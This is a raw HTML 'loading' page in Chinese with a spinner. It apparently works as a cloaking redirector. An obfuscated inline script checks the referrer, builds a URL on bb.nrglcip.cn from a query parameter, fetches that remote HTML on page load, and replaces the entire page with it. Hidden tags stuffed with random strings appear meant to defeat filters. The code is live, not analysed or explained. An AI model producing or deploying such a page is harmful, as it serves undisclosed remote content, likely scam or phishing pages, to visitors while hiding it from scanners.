<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .OHwDXVUW {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .OHwDXVUW .fWmNbZM {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .OHwDXVUW .content {
            line-height: 50px;
            text-align: center
        }

        .OHwDXVUW .img {
            width: 100%
        }

        .OHwDXVUW .fQsIDdWWB {
            text-align: center
        }

        .OHwDXVUW .fQsIDdWWB span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .OHwDXVUW .fQsIDdWWB span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .OHwDXVUW .fQsIDdWWB span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .OHwDXVUW .fQsIDdWWB span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .OHwDXVUW .fQsIDdWWB span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .OHwDXVUW .fQsIDdWWB span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .OHwDXVUW .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function g8MSEOEo5YBlL(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Wr7ZySE = g8MSEOEo5YBlL('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Wr7ZySE +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Wr7ZySE +".html?a=share";
		}
		
        ucB2BNK=url+"#"+new Date().getTime();
        ucB2BNK && function() {
            $.get(ucB2BNK, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >NkFsm1xigymrvx69PU0YTE5oFLIvQ18JK8IPZaUOsldbd7Y2OC</b>
<b style='display:none' >NkFsm1xigymrvx69PU0YTE5oFLIvQ18JK8IPZaUOsldbd7Y2OC</b>
<h1 style='display:none' >Q7tRPU0cwlHLEFjZY7SomH4IFMcMQNbYro9uKHmjyZKeBte3aihb4fO7lZGYOnJ1P19JV4KyMyXKhL0z0Ara6qN</h1><div class="OHwDXVUW">
    <div class="fWmNbZM">
        <div class="fQsIDdWWB">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >xoLrTs2En4zOtV5M80F0lke0pRAgReMOk</li>
<h1 style='display:none' >UXI924Gtv7l5Wgsjz0qQ0QMZOZPyoGBpBIHIVHa5R2GsbQpwXpODyQojVIC19lf0Rz06Ppqv5GJgbGQkP4wzNtrXlAIYJBBQ</h1>
<span style='display:none'>UnyFFw1AMLvL1sETncO6ovlKnLkw8CNe7SIdltC5xxAFPNPfkDMDBctQPmC15E138q4r6bHWueNRYegZiw0Mc6K9z</span>
<b style='display:none' >whLMqTZ0xqstwYyP8e6BH7NTn9T10HPQNxE9kKNgtt1tVTrvDUQL2oE02o3GBt04A6vUxSlK4bAgpAG53nbAt</b></body>
</html>